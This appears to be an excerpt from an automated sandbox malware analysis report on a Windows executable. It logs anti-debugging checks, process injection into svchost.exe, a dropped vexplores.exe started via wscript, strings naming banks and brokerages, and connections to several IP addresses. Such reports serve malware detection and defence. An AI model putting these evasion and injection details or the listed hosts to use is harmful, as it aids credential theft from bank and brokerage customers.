              Source: C:\Users\user\Desktop\kG713MWffq.exeCode function: 0_2_004788BD FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_004788BD
              Source: C:\Users\user\Desktop\kG713MWffq.exeCode function: 0_2_004339B6 GetFileAttributesW,FindFirstFileW,FindClose,0_2_004339B6
              Source: C:\Users\user\Desktop\kG713MWffq.exeCode function: 0_2_0045CAFA FindFirstFileW,FindNextFileW,FindClose,0_2_0045CAFA
              Source: C:\Users\user\Desktop\kG713MWffq.exeCode function: 0_2_00431A86 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00431A86
              Source: C:\Users\user\Desktop\kG713MWffq.exeCode function: 0_2_0044BD27 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,0_2_0044BD27
              Source: C:\Users\user\Desktop\kG713MWffq.exeCode function: 0_2_0045DE8F FindFirstFileW,FindClose,0_2_0045DE8F
              Source: C:\Users\user\Desktop\kG713MWffq.exeCode function: 0_2_0044BF8B _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0044BF8B
              Source: C:\Users\user\Desktop\kG713MWffq.exeCode function: 0_2_0040E500 GetVersionExW,GetCurrentProcess,GetNativeSystemInfo,FreeLibrary,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,FreeLibrary,0_2_0040E500
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 600000Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 599891Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 599781Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 599672Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 599563Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 599438Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 599313Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 599203Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 599094Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 598969Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 598857Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 598750Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 598641Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 598531Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 598422Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 598312Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 598203Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 598094Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 597971Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 597844Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 597734Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 597625Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 597516Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 597406Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 597297Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 597187Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 597078Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 596968Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 596859Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 596750Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 596637Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 596531Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 596421Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 596292Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 596187Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 596078Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 595968Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 595859Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 595750Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 595640Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 595531Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 595422Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 595312Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 595203Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 595094Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 594984Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 594874Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 594765Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 594656Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 594546Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 600000Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 599875Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 599766Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 599626Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 599500Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 599345Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 599202Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 599094Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 598983Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 598875Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 598766Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 598655Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 598545Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 598438Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 598313Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 598203Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 598094Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 597969Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 597860Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 597735Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 597610Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 597485Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 597360Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 597235Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 597110Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 596969Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 596781Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 596670Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 596508Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 596339Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 596216Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 596110Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 595985Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 595860Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 595735Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 595610Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 595485Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 595360Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 595235Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 595110Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 594985Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 594860Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 594735Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 594610Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 594485Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 594360Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 594235Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 594110Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 593985Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 593860Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 593735Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 593610Jump to behavior
              Source: svchost.exe, 00000007.00000002.3870001384.0000000006C59000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696494690
              Source: svchost.exe, 00000007.00000002.3870001384.0000000006CB4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
              Source: svchost.exe, 00000007.00000002.3870001384.0000000006C59000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696494690
              Source: svchost.exe, 00000007.00000002.3870001384.0000000006C59000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
              Source: svchost.exe, 00000007.00000002.3870001384.0000000006C59000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696494690
              Source: svchost.exe, 00000007.00000002.3870001384.0000000006C59000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696494690
              Source: svchost.exe, 00000007.00000002.3870001384.0000000006CB4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696494690]
              Source: svchost.exe, 00000007.00000002.3870001384.0000000006C59000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696494690d
              Source: svchost.exe, 00000007.00000002.3870001384.0000000006C59000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696494690u
              Source: svchost.exe, 00000007.00000002.3870001384.0000000006CB4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696494690
              Source: svchost.exe, 00000007.00000002.3870001384.0000000006CB4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
              Source: svchost.exe, 00000007.00000002.3870001384.0000000006CB4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696494690
              Source: svchost.exe, 00000007.00000002.3870001384.0000000006CB4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696494690
              Source: svchost.exe, 00000007.00000002.3870001384.0000000006C59000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696494690o
              Source: svchost.exe, 00000007.00000002.3870001384.0000000006C59000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
              Source: svchost.exe, 00000007.00000002.3870001384.0000000006C59000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
              Source: svchost.exe, 00000007.00000002.3870001384.0000000006C59000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696494690
              Source: svchost.exe, 00000007.00000002.3870001384.0000000006CB4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696494690x
              Source: svchost.exe, 00000007.00000002.3870001384.0000000006C59000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696494690t
              Source: svchost.exe, 00000007.00000002.3870001384.0000000006C59000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696494690}
              Source: svchost.exe, 00000007.00000002.3870001384.0000000006C59000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696494690x
              Source: svchost.exe, 00000007.00000002.3870001384.0000000006C59000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690
              Source: svchost.exe, 00000007.00000002.3870001384.0000000006C59000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696494690]
              Source: svchost.exe, 00000007.00000002.3870001384.0000000006C59000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696494690x
              Source: svchost.exe, 00000007.00000002.3870001384.0000000006CB4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696494690|UE
              Source: svchost.exe, 00000007.00000002.3870001384.0000000006C59000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
              Source: svchost.exe, 00000007.00000002.3870001384.0000000006CB4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696494690d
              Source: svchost.exe, 00000007.00000002.3870001384.0000000006C59000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696494690|UE
              Source: svchost.exe, 00000007.00000002.3870001384.0000000006C59000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696494690f
              Source: svchost.exe, 00000007.00000002.3870001384.0000000006C59000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696494690s
              Source: svchost.exe, 00000007.00000002.3870001384.0000000006CB4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696494690t
              Source: svchost.exe, 00000007.00000002.3870001384.0000000006CB4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
              Source: svchost.exe, 00000007.00000002.3870001384.0000000006C59000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
              Source: svchost.exe, 00000007.00000002.3870001384.0000000006C59000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
              Source: svchost.exe, 00000007.00000002.3870001384.0000000006CB4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696494690t
              Source: svchost.exe, 00000007.00000002.3870001384.0000000006CB4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696494690u
              Source: svchost.exe, 00000007.00000002.3870001384.0000000006CB4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
              Source: svchost.exe, 00000007.00000002.3870001384.0000000006CB4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696494690}
              Source: svchost.exe, 00000007.00000002.3870001384.0000000006C59000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696494690t
              Source: svchost.exe, 00000007.00000002.3870001384.0000000006CB4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696494690o
              Source: svchost.exe, 00000007.00000002.3870001384.0000000006C59000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696494690}
              Source: svchost.exe, 00000007.00000002.3870001384.0000000006CB4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
              Source: svchost.exe, 00000007.00000002.3870001384.0000000006CB4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696494690j
              Source: svchost.exe, 00000007.00000002.3870001384.0000000006CB4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696494690x
              Source: svchost.exe, 00000007.00000002.3870001384.0000000006CB4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
              Source: svchost.exe, 00000007.00000002.3870001384.0000000006C59000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696494690x
              Source: svchost.exe, 00000007.00000002.3870001384.0000000006C59000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
              Source: svchost.exe, 00000007.00000002.3870001384.0000000006CB4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696494690}
              Source: svchost.exe, 00000007.00000002.3870001384.0000000006C59000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696494690
              Source: svchost.exe, 00000007.00000002.3870001384.0000000006C59000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
              Source: svchost.exe, 00000004.00000002.3866283149.000000000326C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
              Source: svchost.exe, 00000007.00000002.3870001384.0000000006C59000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696494690h
              Source: svchost.exe, 00000007.00000002.3870001384.0000000006CB4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696494690
              Source: svchost.exe, 00000007.00000002.3870001384.0000000006CB4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696494690s
              Source: svchost.exe, 00000007.00000002.3870001384.0000000006C59000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696494690j
              Source: svchost.exe, 00000007.00000002.3866385953.000000000366B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllng>
              Source: svchost.exe, 00000007.00000002.3870001384.0000000006CB4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690
              Source: svchost.exe, 00000007.00000002.3870001384.0000000006CB4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
              Source: svchost.exe, 00000007.00000002.3870001384.0000000006CB4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
              Source: svchost.exe, 00000007.00000002.3870001384.0000000006CB4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696494690x
              Source: svchost.exe, 00000007.00000002.3870001384.0000000006CB4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696494690
              Source: svchost.exe, 00000007.00000002.3870001384.0000000006CB4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696494690
              Source: svchost.exe, 00000007.00000002.3870001384.0000000006CB4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696494690f
              Source: wscript.exe, 00000005.00000002.1726074088.0000019E34CB4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}x1EW)
              Source: svchost.exe, 00000007.00000002.3870001384.0000000006CB4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696494690h
              Source: C:\Users\user\Desktop\kG713MWffq.exeAPI call chain: ExitProcess graph end nodegraph_0-88122
              Source: C:\Users\user\Desktop\kG713MWffq.exeAPI call chain: ExitProcess graph end nodegraph_0-86493
              Source: C:\Windows\SysWOW64\svchost.exeAPI call chain: ExitProcess graph end node
              Source: C:\Windows\SysWOW64\svchost.exeAPI call chain: ExitProcess graph end node
              Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_082A9398 LdrInitializeThunk,4_2_082A9398
              Source: C:\Users\user\Desktop\kG713MWffq.exeCode function: 0_2_0045A370 BlockInput,0_2_0045A370
              Source: C:\Users\user\Desktop\kG713MWffq.exeCode function: 0_2_0040D590 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW,0_2_0040D590
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,4_2_004019F0
              Source: C:\Users\user\Desktop\kG713MWffq.exeCode function: 0_2_0040EBD0 LoadLibraryA,GetProcAddress,0_2_0040EBD0
              Source: C:\Users\user\Desktop\kG713MWffq.exeCode function: 0_2_03DBA590 mov eax, dword ptr fs:[00000030h]0_2_03DBA590
              Source: C:\Users\user\Desktop\kG713MWffq.exeCode function: 0_2_03DBA530 mov eax, dword ptr fs:[00000030h]0_2_03DBA530
              Source: C:\Users\user\Desktop\kG713MWffq.exeCode function: 0_2_03DBC8B8 mov eax, dword ptr fs:[00000030h]0_2_03DBC8B8
              Source: C:\Users\user\Desktop\kG713MWffq.exeCode function: 0_2_03DBDF98 mov eax, dword ptr fs:[00000030h]0_2_03DBDF98
              Source: C:\Users\user\Desktop\kG713MWffq.exeCode function: 0_2_03DBDF38 mov eax, dword ptr fs:[00000030h]0_2_03DBDF38
              Source: C:\Users\user\Desktop\kG713MWffq.exeCode function: 0_2_004238DA __lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,0_2_004238DA
              Source: C:\Windows\SysWOW64\svchost.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Users\user\Desktop\kG713MWffq.exeCode function: 0_2_0041F250 SetUnhandledExceptionFilter,0_2_0041F250
              Source: C:\Users\user\Desktop\kG713MWffq.exeCode function: 0_2_0041A208 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0041A208
              Source: C:\Users\user\Desktop\kG713MWffq.exeCode function: 0_2_00417DAA IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00417DAA
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_0040CE09
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_0040E61C
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_00416F6A
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_004123F1 SetUnhandledExceptionFilter,4_2_004123F1
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,7_2_0040CE09
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,7_2_0040E61C
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_00416F6A
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_004123F1 SetUnhandledExceptionFilter,7_2_004123F1
              Source: C:\Windows\SysWOW64\svchost.exeMemory allocated: page read and write | page guardJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 193.122.6.168 80Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 149.154.167.220 443Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 188.114.97.3 443Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 185.230.214.164 587Jump to behavior
              Source: C:\Users\user\AppData\Local\Videos\vexplores.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
              Source: C:\Users\user\AppData\Local\Videos\vexplores.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
              Source: C:\Users\user\AppData\Local\Videos\vexplores.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 2F4E008Jump to behavior
              Source: C:\Users\user\AppData\Local\Videos\vexplores.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 31B2008Jump to behavior
              Source: C:\Users\user\Desktop\kG713MWffq.exeCode function: 0_2_00436CD7 LogonUserW,0_2_00436CD7
              Source: C:\Users\user\Desktop\kG713MWffq.exeCode function: 0_2_0040D590 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW,0_2_0040D590
              Source: C:\Users\user\Desktop\kG713MWffq.exeCode function: 0_2_00434418 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00434418
              Source: C:\Users\user\Desktop\kG713MWffq.exeCode function: 0_2_0043333C __wcsicoll,mouse_event,__wcsicoll,mouse_event,0_2_0043333C
              Source: C:\Users\user\AppData\Local\Videos\vexplores.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\kG713MWffq.exe"Jump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\Videos\vexplores.exe "C:\Users\user\AppData\Local\Videos\vexplores.exe" Jump to behavior
